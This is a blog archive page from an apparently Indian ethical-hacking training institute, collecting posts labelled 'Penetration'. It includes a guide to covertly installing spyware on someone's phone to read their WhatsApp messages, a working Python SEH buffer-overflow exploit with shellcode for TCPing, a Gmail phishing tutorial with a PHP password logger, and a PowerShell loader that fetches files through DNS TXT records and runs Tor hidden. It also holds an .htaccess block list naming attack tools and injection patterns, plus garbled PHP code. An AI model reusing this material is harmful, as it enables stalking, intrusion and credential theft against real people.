Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune: Penetration

Showing posts with label Penetration. Show all posts

Hacking a WhatsApp Account Unknown rwxr-xr-x 0 5/04/2016 Penetration

Filename	Hacking a WhatsApp Account
Permission	rw-r--r--
Author	Unknown
Date and Time	5/04/2016
Label	Penetration
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

[Disclaimer: USAGE OF SPY APPs WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS. ALSO THE FOLLOWING CONTENT IS FOR EDUCATIONAL PURPOSE. IF YOU TRY TO CARRY OUT ANY MALICIOUS ACTIVITY, THEN YOU ARE ON YOUR OWN. WE WILL NOT BE RESPONSIBLE FOR IT!]

So, without wasting any time, let’s get started!

WhatsApp Hacking:-

WhatsApp has become one of the most popular app to share messages and media instantly. It has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth, people are left with no choice other than to hack WhatsApp account.

We can do this in two ways:

1. WhatsApp Hack using a Spying App: The Easiest Way:-

Even though there are several ways to hack WhatsApp, using a spy app is by far the most simple and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on mobile. Out of several apps out there, mSpy is one of my favorite one to hack WhatsApp.

mSpy Features:-

Hack phone Calls and Text Messages.
Track Real-Time Location with GPS Tracker.
Spy on Contact List and Web Browsing activities.
Monitor Emails, Pictures and Videos.
No Rooting Required!
How to Hack WhatsApp with this App?

Download and Install the app on to the target phone which takes not more than a minute.
After this is done, the app silently records all WhatsApp activities in hidden mode.
All the recorded WhatsApp chat is sent to your online account.
View all the information from anywhere at anytime with your online account.
Want to download mSpy? Download it by clicking here.

2. WhatsApp Hack by Spoofing Mac Address: The Tough Way:-
There is another method to hack WhatsApp known as Mac address spoofing which involves spoofing the Mac address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the Mac of the target WhatsApp phone address, follow the below mentioned steps:

1. Find out the Mac address of the target phone on which you need to hack WhatsApp account:

For Android – Navigate to Settings —> About Device —> Status—> Wi-Fi MAC address.
For iPhone – Navigate to Settings—> General —> About —> Wi-Fi address.
2. Once you’ve the Mac address of the target WHatsApp phone, you can spoof the Mac address as mentioned in my post: Spoofing MAC Address on Android.

3. Next, install WhatsApp on your phone using the target phone number and verify it.

4. Now, you’ve an exact replica of the target WhatsApp account and you should receive all the conversation and updates on your phone as well.

This method of WhatsApp hacking is quite time consuming and is known to have less success rate when compared to the method of using the spy apps. Therefore, if you are someone who does not have sufficient time and skills to implement this, I still recommend the use of mSPy to successfully hack WhatsApp account.

www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Apple CEO Tim Cook: Kids Need To Learn How To Code From Early Age Unknown rwxr-xr-x 0 12/28/2015 Penetration

Filename	Apple CEO Tim Cook: Kids Need To Learn How To Code From Early Age
Permission	rw-r--r--
Author	Unknown
Date and Time	12/28/2015
Label	Penetration
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking

In today’s world, coding has become as important as learning any language to survive while traveling. IQ level of younger generation is increasing along with the new times coming up and so the learning capability of the children.

The younger one starts learning, the better they get with time. And, maybe that’s why we see many records being broken at a very young age, although we might not pay attention to it.

Tim Cook, the current CEO of Apple, presented this concern while visiting a Manhattan Apple store for an “Hour of Code” class to third-grade students.

In an interview followed by his visit to the Apple store, he also stressed much on compulsory computer-science education which schools do not pay enough attention these days. However, he has great hopes towards and thinks that coding will ultimately become a required class for all kids.
“From an economic standpoint the job segment itself today is huge, but it’s going to become even larger.

According to Cook, if the computer science concepts are introduced at a tender age, in a fun way, it’s more likely that kids will start finding these concepts cool enough to carry them forward as they grow older. Hence, they will stay interested into computer-science and that, on the other hand, will produce larger and more diverse tech workforce down the line.

He further added that even if kids don’t grow up to get a lucrative job, they’ll surely discover something amazing and interesting enough to pick up important problem-solving skills along the way.

Joann Khan, Kids’ teacher, said that the it was the probably the first time, kids were introduced to coding, noting that their school has no longer a computer lab. The kids participated in a gaming event which was themed on Star Wars. The Star Wars-themed game was created by the non-profit group Code.org in partnership with Disney. On iPad Minis, Kids used basic drag-and-drop commands to program their droid to do things like pick up scrap metal and evade Stormtroopers.

The “Hour of Code” workshop was one of many held by Apple Inc. The Main purpose of the “Hour of Code” was to introduce as many students as possible to coding and computer science.

www.extremehacking.org

CEH v9 CHFI v8 ECSA v9 CAST ENSA TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, Ethical Hacking Institute in Pune, Ethical Hacking Course in Pune, Ethical Hacking Training in Pune, ceh certification in pune

North Korea’s Red Star OS Is The Worst Linux Distro Ever Made Unknown rwxr-xr-x 0 12/28/2015 Penetration

Filename	North Korea’s Red Star OS Is The Worst Linux Distro Ever Made
Permission	rw-r--r--
Author	Unknown
Date and Time	12/28/2015
Label	Penetration
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking

Linux Kernel is one of the biggest open source projects on planet. To suit one’s purpose, anyone can customize it and use it. So, it shouldn’t be surprising that the North Korean dictatorship chose Linux to build its own operating system that would spy on its citizens.

Red Star OS, North Korea’s own Linux distribution allows the users to see what their governments wants them to see. However, two researchers have presented an in-depth analysis of a leaked version of Red Star OS 3. “We found that the features implemented in Red Star OS are the wet dream of a surveillance state dictator,” said Florian Grunow and Niklaus Schiess.

The Red Star Linux OS comes with a plethora of surveillance tools. All the documents and multimedia files are watermarked to make their tracking easier. Its inbuilt antivirus software and web browser point to the internal government servers.

According to the researchers, even though the OS is built on top of Linux Kernel, it comes with the charming looks of Mac OS X. It has got multiple safeguarding methods to protect its system files that included sudden reboot if the system detects any changes.

“Angae means “Fog” in Korean. The term is widely used in parts of custom code used by the Red Star OS. We will lift the fog on the internals of North Korea’s operating system,” the researchers write.

The researches believe that the OS is made to keep North Koreans isolated. With its Red Star OS, North Korea works to abuse the principles of free software and uses it to suppress free speech. And to do this, they are using a software that is supposed to support free speech. Well, it’s irony at its best.

www.extremehacking.org

CEH v9 CHFI v8 ECSA v9 CAST ENSA TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, Ethical Hacking Institute in Pune, Ethical Hacking Course in Pune, Ethical Hacking Training in Pune, ceh certification in pune

TCPing 2.1.0 Buffer Overflow Vulnerability Unknown rwxr-xr-x 0 11/07/2015 Penetration

Filename	TCPing 2.1.0 Buffer Overflow Vulnerability
Permission	rw-r--r--
Author	Unknown
Date and Time	11/07/2015
Label	Penetration
Action

Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India

TCPing "pings" a server on a specific port using TCP/IP by opening and closing a
connection on the specified port. Results are returned in a similar fashion to that
of Microsoft Windows Ping. This application is intended for use in testing for open
ports on remote machines, or as an alternative to the standard "ping" in a case
where ICMP packets are blocked or ignored.

Vulnerability Details:
=====================

If TCPing is called with an specially crafted CL argument we will cause exception and overwrite
the Pointers to next SEH record and SEH handler with our buffer and malicious shellcode.
No suitable POP POP RET address is avail in TCPing as they start with null bytes 0x00 and will
break our shellcode. However, TCPing is not compiled with SafeSEH which is a linker option, so we
can grab an address from another module that performs POP POP RET instructions to acheive
arbitrary code execution on victims system.

stack dump...

EAX 00000045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 000002CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AAAAAA....
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSANO_DATA (00002AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)

WinDBG dump...

(17a8.149c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
image00400000+0x270a:
0040270a 8802 mov byte ptr [edx],al ds:002b:41414141=??

Exploit code(s):
===============

Python script...

import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx

#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE

seh=struct.pack('<L', 0x77214f99) #POP POP RET

payload="A"*580+nseh+seh+sc+"\x90"*20 #BOOOOOOOM!

subprocess.Popen([vulnpgm, payload], shell=False)

===========================================================

www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India, ceh v9 course in Pune-India,ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Google Translator Exploit for hacking google accounts.. Unknown rwxr-xr-x 0 5/06/2015 Penetration

Filename	Google Translator Exploit for hacking google accounts..
Permission	rw-r--r--
Author	Unknown
Date and Time	5/06/2015
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

Google is our companion, however regardless it has its defects as everything has a tendency to. A bit known blemish inside the media monster permits phishing to occur on Google accounts that would totally sidestep propelled web assurance programs in client's programs and also different assurances that have been placed set up by Google. How might it do this? The space will read as though it is through Google itself.

Propelled Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit

It likewise plays on human brain science, on the grounds that the space seems, by all accounts, to be a believed one that you would visit rather frequently. This sort of phishing permits individuals to take certifications in plain-message, and by utilizing this technique, said programmers likely do as such without anybody figuring it out.

Necessities

A webhosting record

Cpanel access to the webhost

Step 1 Create a Gmail Phishing Page

In the first place, we have to make a phishing page to get ready.

Open up a content record utilizing notebook, or your decision in word processors.

Go to the Google login page.

Right-click some place on the page, and click View page source.

Duplicate the greater part of the substance of the source code and glue them into your content record.

Hit ctrl + f, and quest for "action=" and change the strategy to "GET", and the content to one side of "action=" to "log.php".

Snap File & Save as and spare it with the name "index.php" (make a point to tap the drop-down menu to choose "all records" in the event that its not chose as of now).

Make another content document, and glue the underneath as the substance (glue the crude content, not the numbered). This is the document written in PHP that logs the victimized person's login subtle elements.

$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable = $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?

Spare the document as "log.php". Once more, verify "all records" is chosen in the record sort drop-down menu.

Log into your facilitating record, and transfer both records to the base of your site (not in an envelope).

At the point when accreditations are logged, they will be in a document called "passwords.txt" in the foundation of your site. Check the container beside the "passwords.txt" record when you get a few logs, and snap chmod. Change the document to 466 consents, so other individuals can't read the exploited person's passwords.

Step 2 Manipulating Google

How precisely does the control function behind this? Google Translator. Google interpreter has a powerlessness that if an aggressor makes a fake gmail login page and afterward deciphers it with the apparatus, they would get an impeccably created connection covered by Google itself. Look at this URL for an illustration of a phishing page that was made and afterward conceal in the wake of utilizing the interpretation device.

This idiots clients into deduction the page is genuine. That is to say, take a gander at the URL:

Propelled Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit

Go to Google decipher.

Decipher your page from an alternate dialect into English.

Click the connection and test.

Perceive how startlingly simple it is to control a site even as substantial as Google? Keep safe by continually examining that URL.

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Searching Exploits directly from Microsoft site. Unknown rwxr-xr-x 0 5/06/2015 Penetration

Filename	Searching Exploits directly from Microsoft site.
Permission	rw-r--r--
Author	Unknown
Date and Time	5/06/2015
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

Credit: Amit

In this article, I will show you guys how to search Exploits directly from Microsoft site..

Step 1: Navigate to Microsoft's Technet

Too more than 90% of all PCs on the planet run a form Microsoft's universal Windows working framework (despite the fact that it may shock you that more than 60% of all web servers run some variant of Linux/Unix), Microsoft's vulnerabilities clearly are exceptionally esteemed to the programmer.

Thankfully, Microsoft offers us database of every last one of vulnerabilities they need to recognize, and this can be found at their Microsoft Security Bulletins site page.

Here, Microsoft lays out all the subtle elements of the vulnerabilities that they are mindful of in their working framework and application programming. It goes without saying—I surmise that zero day vulnerabilities and vulnerabilities that Microsoft would like to recognize yet, won't be found here. These vulnerabilities are just those that Microsoft is mindful of and has a patch produced for.

Anyway, what great is it to the programmer to be mindful of vulnerabilities that Microsoft has fixed, you may ask (you did ask that, privilege?). The answer is that not everybody patches.

A few clients and organizations decline to fix due to the creation dangers included and others just fix discontinuously. On the off chance that you look at Netcraft and gaze upward a specific site, it will let you know to what extent since that site has been re-booted. For the most part, a re-boot is important to fix a framework. In the event that the framework has not been re-booted for, say 2 years, we realize that all the vulnerabilities recorded in Microsoft's security release are accessible on that framework. At the point when that is the situation, you can just discover a helplessness that has been found inside that most recent two years and afterward misuse it on that framework.

There is additionally the issue of pilfered programming. A critical portion of the world's working frameworks and applications are pilfered (I'm certain you know no less than one individual was has pilfered programming, right?). It is assessed that a larger part of the product in China and other creating countries is pilfered. This implies that these frameworks won't get the most recent fixes and are helpless against the recorded vulnerabilities in Microsoft's security announcements. How pleasant!

Step 2: Search the Database by Microsoft Vulnerability Number

The Microsoft security notices are an effectively sought database. You can look it by item, date reach or security release number. In the event that you do a reversal and take a gander at some of my Metasploit excercises, you will recognize that we've utilized an endeavor as a part of Metasploit numerous, multiple occassions that is named ms08_067_netapi. That number is the Microsoft security notice number. The ms remains for Microsoft, obviously, the 08 stands for the year the powerlessness was revealed, 2008, and the 067 methods it was 67th defenselessness recognized by Microsoft that year. On the off chance that we hunt Microsoft's security releases down that powerlessness, this is the thing that we find.

Notice that this defenselessness is named "Powerlessness in Server Service Could permit Remote Code Execution". Remote code execution is precisely what we are searching for. It permits audience members/rootkits to be introduced and executed remotely. This clearly incorporates our rootkit of decision, Metasploit's meterpreter. When we tap on it, we get the complete report.

We can see that Microsoft gives us (thank you, Bill!) will an official rundown of the endeavor and tells which of their frameworks are defenseless. On the off chance that we page down we can see a rundown of every influenced document and working frameworks.

Step 3: Search Vulnerabilities by Product

In the event that we are searching for vulnerabilities in a specific item, we can utilize this database and inquiry by item. Case in point, in the event that I was searching for a weakness in Microsoft's Lync (this is Microsoft's endeavor level testing, VOIP, and feature conferencing server with exceptional security highlights), I can essentially choose Lync and this database will reveal to me all the vulnerabilities of that item. Here's the latest defenselessness found in Microsoft's Lync item that "considers remote code execution" Yeah!

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Fun with Powershell: Using TOR with Powershell. Unknown rwxr-xr-x 0 5/05/2015 Penetration

Filename	Fun with Powershell: Using TOR with Powershell.
Permission	rw-r--r--
Author	Unknown
Date and Time	5/05/2015
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

In this article, I will teach you guys on how to connect to TOR network using Powershell.

Powershell is a powerful weapon for Hackers. Those who think that programming is not necessary in Hacking or Security Field just go and watch "POGO".

Powershell Code:

function Get-DnsTXTRecord($DnsHost)
{
    $ZipFileUri = (((Invoke-Expression "nslookup -querytype=txt $DnsHost 8.8.8.8") -match '"') -replace '"', '')[0].Trim()
    $WebClient.DownloadFile($ZipFileUri, $ZipPath)
    $Destination = $Shell.NameSpace($ZipPath).Items();
    # Decompress files
    $Shell.NameSpace($ToolsPath).CopyHere($Destination, 20)
    Remove-Item $ZipPath
}

$ToolsPath = Join-Path $Env:APPDATA $MachineGuid

# Mark the path where tools are extracted as 'Hidden', 'System', 'NotContentIndexed'
if (!(Test-Path $ToolsPath))
{
    $Directory = New-Item -ItemType Directory -Force -Path $ToolsPath
    $Directory.Attributes = 'Hidden', 'System', 'NotContentIndexed'
}

$Tor = Join-Path $ToolsPath 'tor.exe'
$Polipo = Join-Path $ToolsPath 'polipo.exe'
$ZipPath = Join-Path $ToolsPath ($MachineGuid + '.zip')
$WebClient = New-Object Net.WebClient
$Shell = New-Object -ComObject Shell.Application

if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
    Get-DnsTXTRecord 'REDACTEDREDACTED.de'
}

if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
    Get-DnsTXTRecord 'REDACTEDREDACTED.cc'
}

$TorRoamingLog = Join-Path $ToolsPath 'roaminglog'
# Start Tor and maintain an initialization log file
Start-Process $Tor -ArgumentList " --Log `"notice file $TorRoamingLog`"" -WindowStyle Hidden

# Wait for Tor to finish initializing
do
{
    Start-Sleep 1
    $LogContents = Get-Content $TorRoamingLog
}
while (!($LogContents -match 'Bootstrapped 100%: Done.'))

# Start polipo proxy
Start-Process $Polipo -ArgumentList 'socksParentProxy=localhost:9050' -WindowStyle Hidden
Start-Sleep 7
$WebProxy = New-Object Net.WebProxy('localhost:8123')
$WebProxy.UseDefaultCredentials = $True
$WebClient.Proxy = $WebProxy

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Secure your websites from DDOS attack in just one minute.. Unknown rwxr-xr-x 0 4/07/2015 Penetration

Filename	Secure your websites from DDOS attack in just one minute..
Permission	rw-r--r--
Author	Unknown
Date and Time	4/07/2015
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

In this article, I will teach you guys on how you could secure your websites from DDOS in just one minute.

Simply paste the following code below in your root directory:

<?php
/*
#####################################################
# Script: DDOS Security By Team Arizona #
#####################################################
*/

$ Ad_ddos_query = 10, / / number of requests per second to detect DDOS attacks
$ Ad_check_file = 'check.txt'; / / file to write the current state during the monitoring
$ Ad_temp_file = 'all_ip.txt'; / / temporary file
$ Ad_black_file = 'black_ip.txt'; / / will be entered into a zombie machine ip
$ Ad_white_file = 'white_ip.txt'; / / ip logged visitors
$ Ad_dir = 'anti_ddos'; / / directory with scripts
$ Ad_num_query = 0, / / current number of requests per second from a file $ check_file
$ Ad_sec_query = 0, / / second from a file $ check_file
$ Ad_end_defense = 0, / / end while protecting the file $ check_file
$ Ad_sec = date ("s"); / / current second
$ Ad_date = date ("mdHis"); / / current time
$ Ad_defense_time = 10000 / / ddos attack detection time in seconds at which stops monitoring

if (! file_exists ("{$ ad_dir} / {$ ad_check_file}") or! file_exists ("{$ ad_dir} / {$ ad_temp_file}") or! file_exists ("{$ ad_dir} / {$ ad_black_file}") or ! file_exists ("{$ ad_dir} / {$ ad_white_file}") or! file_exists ("{$ ad_dir} / anti_ddos.php")) {
die ("Not enough files.");
}

require ("{$ ad_dir} / {$ ad_check_file}");

if ($ ad_end_defense and $ ad_end_defense> $ ad_date) {
require ("{$ ad_dir} / anti_ddos.php");
} Else {
if ($ ad_sec == $ ad_sec_query) {
$ Ad_num_query + +;
} Else {
$ Ad_num_query = '1 ';
}

if ($ ad_num_query> = $ ad_ddos_query) {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_check_file}", "w");
$ Ad_end_defense = $ ad_date + $ ad_defense_time;
$ Ad_string = '<? Php $ ad_end_defense ='. $ Ad_end_defense. ';?>';
fputs ($ ad_file, $ ad_string);
fclose ($ ad_fp);
} Else {
$ Ad_file = fopen ("{$ ad_dir} / {$ ad_check_file}", "w");
$ Ad_string = '<? Php $ ad_num_query ='. $ Ad_num_query. '; $ Ad_sec_query ='. $ Ad_sec. ';?>';
fputs ($ ad_file, $ ad_string);
fclose ($ ad_fp);
}
}
?>

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Secure your website just in one minute.. Unknown rwxr-xr-x 0 4/06/2015 Penetration

Filename	Secure your website just in one minute..
Permission	rw-r--r--
Author	Unknown
Date and Time	4/06/2015
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

In this article, I will teach you guys on how you could secure your websites in just one minute.

Simply create a file named as .htaccess and paste the following code below:

#####################################################
# Script: htaccess Security By Team Arizona #
#####################################################
# No web server version and indexes
ServerSignature Off
Options -Indexes

# Enable rewrite engine
RewriteEngine On

# Block suspicious request methods
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]

# Block WP timthumb hack
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]

# Block suspicious user agents and requests
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (<|>|'|-|%0A|%0D|%27|%3C|%3E|) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|-|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|
archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]

# Block MySQL injections, RFI, base64, etc.
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*$.*$ [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*$[^)]*$ [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|$|$|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E||-) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^$]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|-|"|$|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|drop|delete|
update|cast|create|char|convert|alter|declare|order|script|
set|md5|benchmark|encode) [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F,L]

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Snowden Leak GCHQ DDoSed Anonymous & LulzSec's Chatrooms Unknown rwxr-xr-x 0 3/19/2014 Penetration

Filename	Snowden Leak GCHQ DDoSed Anonymous & LulzSec's Chatrooms
Permission	rw-r--r--
Author	Unknown
Date and Time	3/19/2014
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

Hello every one, this post contains Weekly Presentation from Ec-Council.

Topic from the Presentation:

"Snowden Leak GCHQ DDoSed Anonymous & LulzSec's Chatrooms"

British intelligence ran Denial of Service attacks against chatrooms used by Anonymous and LulzSec, according to an investigation by NBC News involving Snowden confidante Glenn Greenwald.

Documents leaked by the NSA whistleblower record how a GCHQ unit known as the Joint Threat Research Intelligence Group, or JTRIG, used a packet flood operation dubbed Rolling Thunder to scare away 80 per cent of the users of Anonymous internet chat rooms.
Intelligence agents also infiltrated chatrooms in an operation that successfully identified a hacktivist who siphoned off confidential data from PayPal and also picked up another who had participated in attacks on government websites

Link for the presentation:

https://aspen.eccouncil.org/WeeklyMondayPresentation.aspx

Remember you need to register for downloading the Presentation.

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

DNS AND NTP Based Amplification Attacks Unknown rwxr-xr-x 0 3/16/2014 Penetration

Filename	DNS AND NTP Based Amplification Attacks
Permission	rw-r--r--
Author	Unknown
Date and Time	3/16/2014
Label	Penetration
Action

Ethical Hacking Institute in Pune
./Arizona Team

Credits: Cyber Security and Privacy Foundation

DNS reflection is a method used to perform Distributed Denial Of Service or commonly called as DDOS attack. The method had been used by attacker to take down critical network infrastructure and resource by using DNS server as a resource.

DNS server responds back to the query by sending a response sufficiently larger than the query thus eventually causing DDOS. The system is based upon UDP and thus it does not follow the handshake like TCP. Attacker with spoofed IP address in the DNS request is capable of performing such attack by taking advantage of open DNS or misconfigured DNS.

These attacks are usually categorized into three types:

Repeating Query attack.
Varying Query Attack.
Distributed Attack.

But this attack can be made even more powerful by Amplification.
For an attacker to get this Amplification Attack working, it takes advantage of some of the features of DNS Protocols:

